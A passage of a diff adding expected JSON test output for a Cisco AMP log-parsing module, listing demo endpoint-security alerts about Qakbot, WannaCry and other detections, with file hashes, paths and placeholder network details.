+ "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 7590, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 8772, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Gen.20fu.1201", + "cisco.amp.detection_id": "6411456342573187074", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 589000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11257, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411456342573187073", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 558000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "AySxs.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 12514, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:42.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 692000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1492784107692000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T12:27:42.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13751, + "process.hash.sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 268148295, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458626002840536600, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 15508, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:19:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 161000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583861114428195000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 16640, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:11:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 27000000, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264747552596296000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17570, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.A280012EEE.in10.tht.Talos", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 756000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a659ff79ef7ffacbd61d4c2641379e44", + "file.hash.sha1": "c235e18bae63d6c4b5daadb833686f943de65a5f", + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "file.name": "X4.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18818, + "process.hash.md5": "045451fa238a75305cc26ac982472367", + "process.hash.sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316", + "process.hash.sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97", + "process.name": "wscript.exe", + "process.pid": 4744, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "a659ff79ef7ffacbd61d4c2641379e44", + "c235e18bae63d6c4b5daadb833686f943de65a5f" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 208000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21536, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 853000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 24252, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:49:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 562000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583853374897127000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 26979, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 496121997, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043963, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27909, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 498576872, + "event.action": "Multiple Infected Files", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043964, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29220, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:28:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 440000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671599780921000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 30538, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 453000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 32991, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 35457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179213462437901", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 361000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36650, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 37836, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + 